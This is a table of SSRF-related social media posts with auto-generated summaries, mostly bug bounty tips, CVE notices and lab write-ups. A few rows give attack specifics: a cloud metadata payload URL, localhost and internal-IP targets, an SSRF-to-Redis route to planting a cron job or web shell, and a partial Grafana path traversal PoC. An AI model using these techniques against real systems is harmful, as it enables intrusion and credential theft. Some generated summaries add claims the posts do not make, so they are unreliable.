300 | 2025-06-28 15:03:22 UTC | Server-Side Bugs That Pay Big SSRF (internal request abuse) SSTI (template injection) XXE (XML Entity Injection) Log4Shell-style payloads Blind bugs with Burp Collaborator Quiet bugs massive impact. #BugBounty #SSRF #EthicalHacking #bugbountytip | The content discusses lucrative server-side bugs like SSRF, SSTI, XXE, Log4Shell-style payloads, and blind bugs with Burp Collaborator. These vulnerabilities can have a significant impact and are valuable for bug bounty programs and ethical hacking. Emphasizing the importance of identifying and addressing these issues, the post highlights their potential for exploitation and the need for vigilance in cybersecurity.
| 301 | 2025-06-28 06:03:39 UTC | Live SSRF Demo at Cubeesec Weekly Class! Internal IPs? Metadata? IAM tokens? All exposed in seconds. We don't teach theory, we attack it. Wanna Join Us: 91 8790407216 cubeesec.group@gmail.com cubeesec.com (Coming Soon) #SSRF #cybersecurity #cubeesec | Cubeesec is offering a live SSRF demo showcasing the exposure of internal IPs, metadata, and IAM tokens within seconds. They focus on practical attacks rather than theory in their classes. Contact details for joining include a phone number, email, and website. The demonstration aims to highlight cybersecurity vulnerabilities and techniques. |
| 302 | 2025-06-27 10:58:18 UTC | Understanding Server Side Request Forgery (SSRF) is crucial for web security! By validating inputs, whitelisting domains and monitoring requests we can mitigate risks and protect sensitive data. Let's stay vigilant! #CyberSecurity #SSRF @VisakhVijayan | Understanding Server Side Request Forgery (SSRF) is vital for web security. Mitigate risks by validating inputs, whitelisting domains, and monitoring requests to protect sensitive data. Stay vigilant to enhance cybersecurity. #SSRF #CyberSecurity. |
| 303 | 2025-06-27 07:03:50 UTC | Unauthenticated SSRF Vulnerability in Octo STS - CVE-2025-52477. Update to version 0.5.3 or later to protect against SSRF attacks and safeguard sensitive data. Read more: #SSRF #CVE202552477 #CyberSecurity #Vulert #PatchNow | An unauthenticated SSRF vulnerability (CVE-2025-52477) in Octo STS is identified. To safeguard sensitive data, update to version 0.5.3 or later. Protect against SSRF attacks by applying the patch promptly. Stay informed about cybersecurity threats and vulnerabilities. #SSRF #CVE202552477 #CyberSecurity #Vulert #PatchNow. |
| 304 | 2025-06-26 09:56:12 UTC | CISA Warns of Vulnerabilities in ControlID iDSecure Software Allowing Authentication Bypass | CISA issued a warning about vulnerabilities in ControlID iDSecure software that could lead to authentication bypass. The vulnerabilities could potentially allow unauthorized access to systems using the software. Organizations using this software are advised to update to the latest version to mitigate the risk of exploitation. |
| 305 | 2025-06-25 16:48:34 UTC | we exploited an SSRF vulnerability leading to internal port enumeration. Watch our deep dive and walkthrough: youtu.be/wjQrAsQgL2c #BugBounty #hackerone #BugBountytips #CyberSecurity #ssrf | The content discusses exploiting a Server-Side Request Forgery (SSRF) vulnerability to perform internal port enumeration. A deep dive and walkthrough of the exploit are provided in a video linked at youtu.be/wjQrAsQgL2c. The post includes hashtags related to Bug Bounty, HackerOne, Bug Bounty tips, Cybersecurity, and SSRF. The focus is on demonstrating the exploitation of the vulnerability for educational and security awareness purposes. |
| 306 | 2025-06-25 16:48:33 UTC | Just solved another @theXSSrat lab! This time we exploited an SSRF vulnerability leading to internal port enumeration. Watch our deep dive and walkthrough: youtu.be/wjQrAsQgL2c More lab solutions coming soon, stay tuned! #SSRF #Cybersecurity #BugBounty | A cybersecurity enthusiast successfully exploited an SSRF vulnerability in an @theXSSrat lab, showcasing internal port enumeration. A deep dive and walkthrough video of the exploit is available at youtu.be/wjQrAsQgL2c. More lab solutions are on the way, so followers are encouraged to stay tuned for updates. The post highlights the importance of SSRF awareness in cybersecurity and bug bounty hunting. |
| 307 | 2025-06-25 04:48:19 UTC | 3. No Silver Bullets. There's no silver bullet, not in folklore, not in AppSec. Security isn't a one-liner. It's a process: Think. Test. Break. Fix. Repeat. Full post: Lab & code: #SSRF #AppSec #NoSilverBullet #SecureCoding | The content emphasizes that there are no quick fixes or easy solutions in security, whether in folklore or application security (AppSec). Security is described as a continuous process involving thinking, testing, breaking, fixing, and repeating. The post highlights the importance of this iterative approach in secure coding practices, particularly in addressing issues like Server-Side Request Forgery (SSRF). |
| 308 | 2025-06-24 19:48:29 UTC | SSRF XSS via PDF Generator: 1. App accepts user URLs, renders them to PDF (server-side) 2. Attacker hosts HTML with 3. App fetches malicious page and renders it 4. PDF preview opens with embedded JS. SSRF turns into stored XSS #bugbounty #ssrf | The content discusses a security vulnerability where a PDF generator application accepts user URLs, rendering them to PDF server-side. An attacker can exploit this by hosting malicious HTML, tricking the app to fetch and render it, leading to a PDF preview with embedded JavaScript. This vulnerability allows Server-Side Request Forgery (SSRF) to escalate into Stored Cross-Site Scripting (XSS). The issue is highlighted for bug bounty purposes. |
| 309 | 2025-06-23 07:38:32 UTC | Weekly Security Sync Complete! This week we dived into the process, approach & working of SSRF (Server-Side Request Forgery). No charges, just pure knowledge! Call/Message Us 91-8790407216 Email cubeesec.group@gmail.com #ssrf #infosec #bugbounty | The content highlights the completion of the Weekly Security Sync focusing on SSRF (Server-Side Request Forgery), offering knowledge without charges. Contact details for further information are provided. The post emphasizes the importance of understanding SSRF in the context of information security and bug bounty programs. |
| 310 | 2025-06-23 05:38:47 UTC | Weekly Security Sync Complete! This week we dived into the process, approach & working of SSRF (Server-Side Request Forgery). No charges, just pure knowledge! 91-8790407216 cubeesec.group@gmail.com #cybersecurity #ssrf #infosec #bugbounty | The content discusses the completion of the weekly security sync focusing on SSRF (Server-Side Request Forgery). It emphasizes sharing knowledge without any charges, providing contact information for further inquiries. The post includes hashtags related to cybersecurity, SSRF, infosec, and bug bounty. The main points are the exploration of SSRF processes, approach, and operations, along with contact details for cubeesec.group. |
| 311 | 2025-06-22 18:48:26 UTC | SSRF via Image URL Upload: 1. App fetches metadata from user-supplied image URLs 2. Payload: http://169(.)254(.)xx.xx/latest/meta-data/ 3. No outbound request filtering 4. Internal AWS metadata leaked. Image URL Internal network access #bugbounty #ssrf | The content discusses a security vulnerability known as SSRF (Server-Side Request Forgery) through image URL upload. Key points include an app fetching metadata from user-supplied image URLs, a payload example leading to internal AWS metadata leakage, lack of outbound request filtering, and the risk of granting internal network access through image URLs. The post highlights the potential for exploiting this vulnerability for bug bounty rewards and includes relevant hashtags. |
| 312 | 2025-06-21 16:33:20 UTC | This is how top hunters earn $500, $1K, even $5K per bug. #BugBounty #ReconTips #XSS #SSRF #IDOR #AssetDiscovery #WebSecurity #InfoSec #EthicalHacking #RedTeam #HackerWorkflow | Top hunters in bug bounty programs can earn significant rewards, ranging from $500 to $5K per bug. They utilize various techniques like ReconTips, XSS, SSRF, IDOR, AssetDiscovery, and focus on WebSecurity, InfoSec, EthicalHacking, RedTeam, and HackerWorkflow. These experts leverage their skills to identify vulnerabilities and report them to organizations for rewards. |
| 313 | 2025-06-20 07:28:22 UTC | SSRF: Server-Side Request Forgery. Trick the server into calling internal services for you. Simple trick, massive damage. Bypass firewalls. Access internal IPs. Steal cloud metadata. #SSRF #cybersecurity #bugbounty #websecurity #cloudsecurity #ethicalhacking #infosec | The content discusses SSRF (Server-Side Request Forgery), a technique to trick servers into accessing internal services, potentially causing significant damage. It highlights the ability to bypass firewalls, access internal IPs, and steal cloud metadata. The post emphasizes the seriousness of SSRF in cybersecurity, bug bounty programs, web security, cloud security, ethical hacking, and information security. The content warns about the risks associated with SSRF and the importance of safeguarding against such vulnerabilities. |
| 314 | 2025-06-19 23:28:14 UTC | Day 43: CSRF, SSRF & Clickjacking Attacks. Security is often broken not by what users do but by what their browsers or servers are tricked into doing. Today's deep dive covered 3 trust-based web attacks #CyberSecurity #WebSecurity #CSRF #SSRF #Clickjacking | The content discusses CSRF, SSRF, and Clickjacking attacks, highlighting that security breaches often occur due to actions tricked browsers or servers take, rather than user actions. The focus is on trust-based web attacks, emphasizing the importance of cybersecurity measures. The post aims to raise awareness about these threats and their implications for web security. |
| 315 | 2025-06-19 10:11:49 UTC | Open Next for Cloudflare SSRF Vulnerability Let Attackers Load Remote Resources from Arbitrary Hosts | The content discusses a Server-Side Request Forgery (SSRF) vulnerability in Open Next for Cloudflare, allowing attackers to load remote resources from any host. This vulnerability can be exploited by attackers to manipulate the server into making unauthorized requests to external systems, potentially leading to data breaches or system compromise. It highlights the importance of promptly addressing and patching such vulnerabilities to prevent unauthorized access and protect sensitive information. |
| 316 | 2025-06-19 05:46:26 UTC | Open Next SSRF Flaw in Cloudflare Lets Hackers Fetch Data from Any Host | A new SSRF (Server-Side Request Forgery) vulnerability in Cloudflare allows hackers to retrieve data from any host. This flaw poses a security risk as it enables unauthorized access to sensitive information. It is important for Cloudflare to address and patch this vulnerability promptly to prevent exploitation by malicious actors. |
| 317 | 2025-06-19 04:23:18 UTC | @yousukezan . This causes content controlled by the attacker () to be served through the victim's domain (). #SSRF #SecurityFlaw | The content discusses a security flaw known as Server-Side Request Forgery (SSRF), where an attacker can manipulate a server to serve content through a victim's domain. This poses a risk as the attacker can control the content being served. The tweet mentions @yousukezan and includes a link for more information on the SSRF vulnerability. |
| 318 | 2025-06-19 02:23:15 UTC | A critical SSRF flaw (CVE-2025-6087) in @opennextjs/cloudflare allows unauthenticated users to proxy arbitrary remote content via /_next/image endpoint. Update to v1.3.0. #SSRF #Cloudflare #NextJS #Cybersecurity #Vulnerability | A critical SSRF flaw (CVE-2025-6087) in @opennextjs/cloudflare enables unauthenticated users to proxy remote content via /_next/image endpoint. Update to v1.3.0 to address the vulnerability. #SSRF #Cloudflare #NextJS #Cybersecurity. |
| 319 | 2025-06-18 18:23:09 UTC | Finding SSRFs in Azure DevOps - Part 2 #SSRF #AzureDevOps #AzureSecurity #DNSRebinding #SourceCodeDebugging binsec.no/posts/2025/05/ | The content discusses the identification of Server-Side Request Forgery (SSRF) vulnerabilities in Azure DevOps, focusing on Azure Security, DNS Rebinding, and Source Code Debugging. It is part 2 of a series and provides insights into detecting SSRFs within Azure DevOps environments. The article can be found on binsec.no/posts/2025/05/. |
| 320 | 2025-06-18 12:18:36 UTC | SSRF via PDF Generator: 1. App fetches URLs to generate PDFs (e.g. invoices, reports) 2. Attacker supplies internal URL (e.g. http://localhost/admin) 3. PDF engine fetches it server-side 4. Leaks internal content in rendered PDF. SSRF data exposure #bugbounty #ssrf | The content discusses a security vulnerability known as Server-Side Request Forgery (SSRF) via a PDF Generator app. The vulnerability allows an attacker to supply internal URLs, which the PDF engine fetches server-side, leading to the leakage of internal content in the generated PDFs. This SSRF issue results in data exposure. The post highlights the risk posed by this vulnerability and suggests it as a target for bug bounty programs. |
| 321 | 2025-06-17 14:18:32 UTC | Some libraries (e.g. image downloaders or PDF generators) work on URLs without any filtering. If the user can supply a URL, they can enter http://localhost:3306 and connect to the internal database or AWS metadata. It's called SSRF. Pay close attention to these points! #PHP #SSRF #CloudSecurity | Some libraries like image downloaders or PDF generators work without filtering URLs, allowing users to potentially connect to internal databases or AWS metadata by inputting URLs like http://localhost:3306. This vulnerability is known as Server-Side Request Forgery (SSRF). It's crucial to pay attention to these points for security. The content emphasizes the importance of being cautious about SSRF risks in PHP applications and cloud security. |
| 322 | 2025-06-16 08:13:32 UTC | 4 #GeoServer 2.24.4 and 2.25.2 vulnerable to #SSRF via demo request if Proxy Base URL unset. Update to stay protected (Reference: CVE-2024-29198) | GeoServer versions 2.24.4 and 2.25.2 are susceptible to Server-Side Request Forgery (SSRF) attacks through demo requests when the Proxy Base URL is not set. To mitigate this vulnerability, users are advised to update their GeoServer installations. The reference for this issue is CVE-2024-29198. |
| 323 | 2025-06-15 04:03:26 UTC | Hunting for SSRF? Try manipulating URLs in your app (think image uploads, webhooks) to target internal IPs (127.0.0.1, 192.168.x.x). See if the server leaks internal info or allows unauthorized actions! #SSRF #WebSecurity | The content discusses hunting for Server-Side Request Forgery (SSRF) vulnerabilities by manipulating URLs in applications to target internal IPs like 127.0.0.1 and 192.168.x.x. This can reveal if the server leaks internal information or allows unauthorized actions. The focus is on testing web security by exploiting potential SSRF issues related to image uploads and webhooks. #SSRF #WebSecurity. |
| 324 | 2025-06-14 20:03:19 UTC | URL schemes: Not all links are http:// or https:// Some can be dangerous #URL #BugBounty #BugBountytips #XSS #SSRF #OpenRedirect | The content discusses URL schemes, highlighting that not all links are safe with the common http:// or https:// prefixes. Some URLs can be dangerous, posing risks such as XSS, SSRF, and Open Redirect vulnerabilities. The post emphasizes the importance of being cautious with URLs and understanding potential security threats associated with different URL schemes. It also suggests that users should be vigilant, especially in the context of Bug Bounty programs. |
| 325 | 2025-06-14 13:03:57 UTC | SSRF Hunting 101: Can you trick a server into making requests for you? Look for URLs or endpoints that accept URLs as input. Try local IPs (127.0.0.1), internal services or metadata endpoints. #SSRF #WebSec | The content discusses SSRF (Server-Side Request Forgery) hunting by tricking a server into making requests for the attacker. It suggests looking for URLs or endpoints that accept URLs as input, trying local IPs like 127.0.0.1, internal services, or metadata endpoints. The focus is on exploiting vulnerabilities to manipulate servers into making unauthorized requests. The content also includes hashtags related to SSRF and Web Security. |
| 326 | 2025-06-13 18:58:46 UTC | #ThreatProtection #CVE-2025-4123 #Grafana #XSS and Full-Read #SSRF #vulnerability read more about Symantec's protection: broadcom.com/support/securi | The content highlights a vulnerability related to Grafana, specifically XSS and SSRF, identified as CVE-2025-4123. It suggests learning more about Symantec's protection measures for this threat by visiting broadcom.com/support/security. The post emphasizes the importance of threat protection and directs readers to further information on safeguarding against these vulnerabilities. |
| 327 | 2025-06-13 17:58:34 UTC | Good old 127.1 #ssrf | The content mentions "Good old 127.1" and includes the hashtag #ssrf and a link (https://ift.tt/c6F4K0p). The term "127.1" is often used to refer to the loopback address in networking (127.0.0.1). The hashtag #ssrf could be related to Server-Side Request Forgery, a type of vulnerability. The link provided may lead to further information or resources related to these topics. |
| 328 | 2025-06-11 23:48:37 UTC | Beware of the silent danger - SSRF! It can turn your own server into a weapon against you! Understand its mechanisms and secure your network. Stay informed about this #OWASP Top 10 vulnerability! #WebSecurity #SSRF | The content warns about SSRF, a silent danger that can make your server a weapon against you. Understanding SSRF mechanisms is crucial to secure your network. Stay informed about this OWASP Top 10 vulnerability to enhance web security and protect against SSRF attacks. #WebSecurity #SSRF. |
| 329 | 2025-06-11 15:56:18 UTC | Apache Kafka Arbitrary File Read and SSRF Vulnerability (CVE-2025-27817) | The content discusses a security vulnerability in Apache Kafka, identified as CVE-2025-27817, which allows attackers to perform arbitrary file reads and Server-Side Request Forgery (SSRF) attacks. This vulnerability could potentially lead to unauthorized access to sensitive information or resources. It is crucial for users of Apache Kafka to be aware of this issue and take necessary precautions to mitigate the risk of exploitation. |
| 330 | 2025-06-11 06:48:33 UTC | SSRF Redis RCE: 1. App fetches URLs from user input (no whitelist) 2. Attacker targets (Redis) 3. Sends payload to write cron job or web shell 4. Redis accepts raw commands code execution. SSRF open Redis = full server pwn #bugbounty #ssrf #rce | The content discusses a security vulnerability known as SSRF leading to Redis Remote Code Execution (RCE). The vulnerability arises from an application fetching URLs from user input without a whitelist. An attacker can exploit this by targeting Redis, sending a payload to execute commands like writing a cron job or web shell. Since Redis accepts raw commands, this can lead to code execution. The combination of SSRF and an open Redis server can result in a full server compromise. The post highlights the severity of the bug and mentions relevant hashtags like #bugbounty, #ssrf, and #rce. |
| 331 | 2025-06-10 20:43:49 UTC | Magoo, a Python-based tool for SSRF (Server-Side Request Forgery) vulnerability hunting and unauthorized port scanning. github.com/JoshuaProvoste #BugBounty #Hacking #SSRF | Magoo is a Python tool designed for finding SSRF vulnerabilities and conducting unauthorized port scanning. It is available on GitHub under the username JoshuaProvoste. The tool is useful for Bug Bounty programs and hacking activities related to SSRF. It can assist in identifying security weaknesses in web applications by testing for SSRF vulnerabilities and scanning for open ports without authorization. |
| 332 | 2025-06-10 05:43:32 UTC | SSRF attacks simplified. This post breaks down how attackers target EC2 metadata and how to stay a step ahead. Cyber doesn't have to feel complicated. Follow @Cytrusst for weekly security insights that just make sense. #CyberSecurity #CloudSecurity #SSRF #Infosec #Cytrusst | This content simplifies SSRF attacks, explaining how attackers target EC2 metadata and how to prevent them. It emphasizes making cybersecurity less complex. Follow @Cytrusst for straightforward security insights. Key hashtags: #CyberSecurity #CloudSecurity #SSRF #Infosec #Cytrusst. |
| 333 | 2025-06-09 22:38:40 UTC | Found a critical SSRF during a pentest. PDF export accepted raw HTML so I injected an | A critical Server-Side Request Forgery (SSRF) vulnerability was discovered during a penetration test. The vulnerability was found in a PDF export feature that accepted raw HTML input, allowing for injection of malicious code. |
| 334 | 2025-06-09 06:33:23 UTC | @_curious_Dev_ Great question! Input validation & whitelisting are key first steps. Also consider using a proxy server to control outbound requests and limit access to internal resources. #SSRF #webappsecurity | The content emphasizes the importance of input validation, whitelisting, and using a proxy server for web application security. These measures help prevent security vulnerabilities like Server-Side Request Forgery (SSRF) by controlling outbound requests and limiting access to internal resources. By implementing these steps, developers can enhance the security of their web applications. |
| 335 | 2025-06-08 18:38:22 UTC | I completed the Web Security Academy lab: SSRF with blacklist-based input filter. This was fun and surprisingly easy #cybersecurity #portswigger #SSRF @WebSecAcademy @ireteeh @Cyblackorg portswigger.net/web-security/s | The content discusses completing a Web Security Academy lab on SSRF with a blacklist-based input filter, finding it fun and surprisingly easy. The post includes hashtags related to cybersecurity and mentions of PortSwigger, Web Security Academy, and other relevant accounts. The link provided likely leads to additional information or resources related to the lab completion. |
| 336 | 2025-06-08 04:33:47 UTC | @sushicomabacate SSRF, on the other hand, allows the attacker to manipulate the application into making malicious HTTP requests on behalf of the server, accessing internal network resources that are not publicly exposed. This can compromise database services or internal APIs. #SSRF | The content discusses SSRF (Server-Side Request Forgery), where attackers manipulate applications to make malicious HTTP requests on behalf of the server, accessing internal network resources not publicly exposed. This vulnerability can compromise internal database services or APIs. The post highlights the risks associated with SSRF attacks and provides a link for further information. |
| 337 | 2025-06-06 20:28:25 UTC | Day 18 Full-Time Bug Bounty - Learned some cool stuff in JavaScript today, starting to really get how things work behind the scenes. - Found a possible SSRF on a public H1 program, hope it's not a dupe. Total Report Payouts: $0 #BugBounty #SSRF | Day 18 of full-time bug bounty work involved learning about JavaScript intricacies and discovering a potential SSRF on a public H1 program. The individual is gaining a deeper understanding of how things operate behind the scenes. The total report payouts for the day were $0. #BugBounty #SSRF. |
| 338 | 2025-06-06 15:28:23 UTC | SSRF Cloud Metadata: 1. URL input not properly validated 2. Attacker sends request to 3. Server-side request fetches cloud credentials 4. Credentials used to access internal services or take over infra. #SSRF Cloud hack #BugBounty | The content discusses a Server-Side Request Forgery (SSRF) vulnerability where the URL input is not validated correctly. An attacker can exploit this by sending a request, allowing them to retrieve cloud credentials through a server-side request. These credentials can then be used to access internal services or take control of the infrastructure. The post highlights the potential for SSRF to lead to a cloud hack and mentions it as a target for Bug Bounty programs. |
| 339 | 2025-06-05 23:21:42 UTC | Exploiting OS command injection vulnerabilities to exfiltrate data with Burp Suite | The content discusses utilizing OS command injection vulnerabilities to extract data using Burp Suite, a popular web application security testing tool. By exploiting these vulnerabilities, attackers can execute arbitrary commands on the underlying operating system, potentially leading to data exfiltration. Burp Suite assists in identifying and exploiting these vulnerabilities, highlighting the importance of addressing and securing such weaknesses to prevent unauthorized access and data breaches. |
| 340 | 2025-06-05 08:18:44 UTC | New video out! Bypassed SSRF filters using internal routing logic. Blacklist? Useless. Accessed internal services via crafted requests. Watch the full breakdown youtu.be/4WOlWBXLI-A #SSRF #WebSecurity #BugBounty #InfoSec #Hacking #CyberSecurity | A new video demonstrates bypassing SSRF filters using internal routing logic, rendering blacklists ineffective. The video showcases accessing internal services through crafted requests. The full breakdown is available at the provided link. The content focuses on SSRF, web security, bug bounty, infosec, hacking, and cybersecurity. |
| 341 | 2025-06-05 04:18:12 UTC | SSRF Hunting 101: Can you make the server request itself (or internal resources) via a URL? Try manipulating parameters meant for external APIs. If it works, you've got SSRF! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting by attempting to make the server request itself or internal resources via a URL. It suggests manipulating parameters intended for external APIs to test for SSRF vulnerabilities. If successful, it indicates the presence of SSRF, a security risk. The post emphasizes the importance of web security and provides a basic guide for identifying SSRF issues. #SSRF #WebSecurity. |
| 342 | 2025-06-04 21:23:29 UTC | Our researchers discovered a critical SSRF XSS chain: 1. SSRF abused to fetch internal JS endpoint 2. Injected payload reflected in an internal admin panel 3. Admin loads it via | Researchers found a significant security vulnerability involving SSRF and XSS. The exploit chain involved abusing SSRF to access an internal JS endpoint, injecting a payload that appeared in an internal admin panel, and then being loaded by an admin. This chain highlights the potential risks of SSRF and XSS vulnerabilities when combined, showcasing how attackers can exploit these weaknesses to gain unauthorized access to internal systems. |
| 343 | 2025-06-04 06:13:38 UTC | #Cycatz #cybersecurity Blind SSRF More.... shorturl.at/K2uOY #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #mobilesecurity #emailsecurity #cloudsecurity #governanceriskcompliance #vendorriskmanagement #brandmonitoring #incedentreport #bug #SSRF | The content discusses various aspects of cybersecurity, including Blind SSRF, cyber attack surface management, dark web monitoring, mobile security, email security, cloud security, governance risk compliance, vendor risk management, brand monitoring, incident reporting, bugs, and SSRF. It emphasizes the importance of these elements in maintaining robust cybersecurity measures. The provided link likely leads to more detailed information on these topics. |
| 344 | 2025-06-04 06:13:37 UTC | New Grafana Exploit CVE-2025-4123 XSS SSRF Open redirect Account Hijack. A full exploit chain that breaks Grafana wide open! Watch the full breakdown: youtu.be/tf8_Tuj0huQ?si #BugBounty #CyberSecurity #Grafana #XSS #SSRF #CVE2025 | A new Grafana exploit CVE-2025-4123 has been discovered, involving XSS, SSRF, open redirect, and account hijack vulnerabilities. The exploit chain poses a significant threat to Grafana security. A detailed breakdown of the exploit is available in a video. This discovery is relevant to Bug Bounty programs, Cybersecurity, and Grafana users. The exploit's severity is highlighted by the use of multiple attack vectors. |
| 345 | 2025-06-03 10:18:21 UTC | Web Security Alert. Explore critical vulnerabilities: SSRF: Exploits server requests to access internal systems. Open Redirects: Facilitate phishing by redirecting users to malicious sites. Dive deeper: #CyberSecurity #WebSecurity #SSRF | The content warns about critical web security vulnerabilities: SSRF exploits server requests to access internal systems, while Open Redirects can facilitate phishing by redirecting users to malicious sites. The message encourages further exploration of cybersecurity topics like SSRF. |
| 346 | 2025-06-02 08:08:23 UTC | 2 #Grafana users: Versions before 12.0.1 allow reflected XSS open redirects leading to #SSRF risks. Update ASAP (Reference: CVE-2025-4123). | Users of Grafana versions prior to 12.0.1 are at risk of reflected XSS and open redirects, which can lead to SSRF vulnerabilities. It is crucial to update to the latest version immediately to mitigate these security risks. The vulnerability is identified as CVE-2025-4123. |
| 347 | 2025-06-02 03:08:43 UTC | Esri patches a critical SSRF vulnerability in Portal for ArcGIS allowing unauthenticated remote attackers to bypass protections and access internal services. #Esri #ArcGIS #SSRF #Cybersecurity securityonline.info/critical-ssrf- | Esri addressed a severe SSRF vulnerability in Portal for ArcGIS, enabling unauthenticated remote attackers to evade security measures and reach internal services. The patch is crucial for preventing unauthorized access. #Esri #ArcGIS #SSRF #Cybersecurity. |
| 348 | 2025-06-01 20:03:47 UTC | Hunting for SSRF? Try injecting URLs in parameters! Look for endpoints that fetch data. Test with internal IPs (127.0.0.1) or your own server to see if they're vulnerable. #SSRF #WebSecurity | The content discusses hunting for Server-Side Request Forgery (SSRF) vulnerabilities by injecting URLs in parameters of endpoints that fetch data. It suggests testing with internal IPs like 127.0.0.1 or your own server to check for vulnerability. The focus is on identifying and exploiting SSRF issues for improved web security. #SSRF #WebSecurity. |
| 349 | 2025-06-01 09:51:47 UTC | Portal for ArcGIS Security 2025 Update 2 Patch | The content refers to an update patch for Portal for ArcGIS Security 2025. It is recommended to apply this patch to enhance the security features of the portal. The provided link directs users to access and install the update. |
| 350 | 2025-05-31 12:33:53 UTC | SSRF hunting? Try manipulating URLs in your target app! See if you can force it to make requests to internal resources or external IPs. Watch out for redirects & error messages! #SSRF #WebSecurity | The content suggests using URL manipulation to hunt for Server-Side Request Forgery (SSRF) vulnerabilities in a target application. By manipulating URLs, one can attempt to make the application send requests to internal resources or external IPs. It advises being cautious of redirects and error messages while conducting this testing for SSRF vulnerabilities. The post emphasizes the importance of web security and includes relevant hashtags like #SSRF and #WebSecurity. |
| 351 | 2025-05-31 05:28:49 UTC | Great explanation of CSRF vs SSRF. Key difference: CSRF is happening more in the browser and directly to the main server. SSRF is happening on the backend (behind the scenes) from one server to the other #infosec #CyberSecurity #csrf #ssrf @snyksec youtu.be/rgDq_Bi64OM?si | The content provides a clear explanation of the key difference between CSRF and SSRF. CSRF occurs more in the browser, affecting the main server directly, while SSRF takes place on the backend between servers. The post emphasizes the importance of understanding these distinctions for information security and cybersecurity. The content is shared with relevant hashtags and a link to a video for further explanation. |
| 352 | 2025-05-30 12:23:43 UTC | New Article Alert! Explore UNC2903 Cloud Intrusion TTPs and how they exploited Adminer SSRF for metadata harvesting. Stay informed, stay secure. Read now: #CyberWarfareLabs #CloudSecurity #UNC2903 #SSRF #InfoSec #TTPAnalysis #Article | The content alerts readers to a new article discussing UNC2903 Cloud Intrusion TTPs and their use of Adminer SSRF for metadata harvesting. It emphasizes staying informed and secure in the realm of cybersecurity. The article covers topics like CyberWarfareLabs, Cloud Security, InfoSec, and TTP Analysis. Readers are encouraged to read the full article for more insights and information. |
| 353 | 2025-05-30 07:28:39 UTC | Critical CVE-2025-4967 in Esri Portal for ArcGIS (v11.4 & earlier) allows unauthenticated SSRF, CVSS score: 9.1. Patch now to secure your systems. Details #cybersecurity #infosec #ArcGIS #SSRF #CVE20254967 | A critical CVE-2025-4967 vulnerability in Esri Portal for ArcGIS (v11.4 & earlier) enables unauthenticated SSRF with a CVSS score of 9.1. Immediate patching is advised to enhance system security. For more information, visit the provided link. #cybersecurity #infosec #ArcGIS #SSRF #CVE20254967 |
| 354 | 2025-05-29 15:28:33 UTC | Day 6 Bug Bounty. Focused mostly on recon (same target). Learned more about SSRF with real-world case studies #bugbounty #SSRF #infosec | Day 6 of bug bounty focused on reconnaissance on the same target. The focus was on learning more about Server-Side Request Forgery (SSRF) through real-world case studies. The content highlights the importance of understanding SSRF in the context of bug bounty programs and information security. #bugbounty #SSRF #infosec. |
| 355 | 2025-05-29 08:23:25 UTC | High severity #SSRF in mcp-markdownify-server (CVE-2025-5276) lets attackers access internal resources via Markdownify.get(). Patch now! Details: radar.offseq.com/threat/cve-202 #OffSeq #cybersecurity #infosec | A high severity Server-Side Request Forgery (SSRF) vulnerability in mcp-markdownify-server (CVE-2025-5276) allows attackers to access internal resources through Markdownify.get(). Immediate patching is advised. More information available at radar.offseq.com/threat/cve-2025-5276. #OffSeq #cybersecurity #infosec. |
| 356 | 2025-05-29 01:23:43 UTC | Just dropped NovaLure! My new Python OAST scanner that automates specific Blind SSRF & other out-of-band checks using Interactsh. Great for bug bounty hunters! #OAST #SSRF #BugBounty #InfoSec #PythonTool #CyberSecurity | NovaLure is a new Python OAST scanner designed for automating Blind SSRF and out-of-band checks using Interactsh. It is beneficial for bug bounty hunters and focuses on cybersecurity. The tool aims to enhance security testing processes and improve efficiency in bug hunting activities. #OAST #SSRF #BugBounty #InfoSec #PythonTool #CyberSecurity. |
| 357 | 2025-05-26 12:13:40 UTC | SSRF Hunting 101: Try injecting URLs into parameters! Look for image uploads URL shorteners or anything that fetches data from a provided address. Test with internal IPs (127.0.0.1) cloud metadata endpoints and your own server. #SSRF #WebSecurity | The content discusses SSRF hunting tips, suggesting injecting URLs into parameters to exploit vulnerabilities. It advises testing with internal IPs, cloud metadata endpoints, and personal servers. Key points include looking for image uploads, URL shorteners, and data fetching mechanisms. The content emphasizes the importance of web security and using these techniques to identify and prevent SSRF attacks. #SSRF #WebSecurity |
| 358 | 2025-05-26 10:13:20 UTC | Understand critical web vulnerabilities and how to prevent them. Read now techoral.com/security/web-v #CyberSecurity #WebSecurity #XSS #CSRF #SSRF #OWASP #BugBounty #InfoSec #WebDev | The content discusses the importance of understanding critical web vulnerabilities like XSS, CSRF, and SSRF, and how to prevent them. It emphasizes the significance of cybersecurity, web security, and provides resources for further reading. The content also mentions OWASP, Bug Bounty programs, and the intersection of information security and web development. It encourages readers to visit techoral.com/security/web-v for more information on these topics. |
| 359 | 2025-05-25 12:08:31 UTC | Revised the SSRF module on TryHackMe! Gaining a deeper understanding of Server-Side Request Forgery. #tryhackme #SSRF #websecurity #bugbounty #infosec via @realtryhackme | The content discusses the revision of the SSRF module on TryHackMe, emphasizing gaining a deeper understanding of Server-Side Request Forgery. The post highlights the importance of web security, bug bounty programs, and information security. It encourages individuals to engage with the updated module to enhance their knowledge and skills in this area. The content is shared via TryHackMe's official platform, aiming to educate and raise awareness about SSRF vulnerabilities and defenses. |
| 360 | 2025-05-25 11:04:10 UTC | If you are interested in #ChestWall #Injury #Trauma #RibFractures #SSRF #costalcartilage #sternum #Ribs #thoracictrauma #SRS #SlippingRibSyndrome and are not following @CWISociety on #LinkedIn then you should! | The content promotes following @CWISociety on LinkedIn for updates on chest wall injuries, trauma, rib fractures, slipping rib syndrome, and related topics. It emphasizes the importance of staying informed about these issues by following the society's updates on LinkedIn. |
| 361 | 2025-05-24 08:48:41 UTC | CVE-2025-4123: Critical Grafana vulnerability! Path traversal Open Redirect XSS/SSRF chain CVSS: 7.6 \| No auth required POC: /public/..%2F%.. Full demo: #CVE2025 #Grafana #BugBounty #SSRF #XSS | A critical Grafana vulnerability, CVE-2025-4123, allows path traversal, leading to Open Redirect, XSS, and SSRF chain. The CVSS score is 7.6, and no authentication is needed. A proof of concept is provided at /public/..%2F%.. Full demo available. This issue is significant for Grafana security and is being highlighted with relevant hashtags like #CVE2025, #Grafana, #BugBounty, #SSRF, and #XSS. |
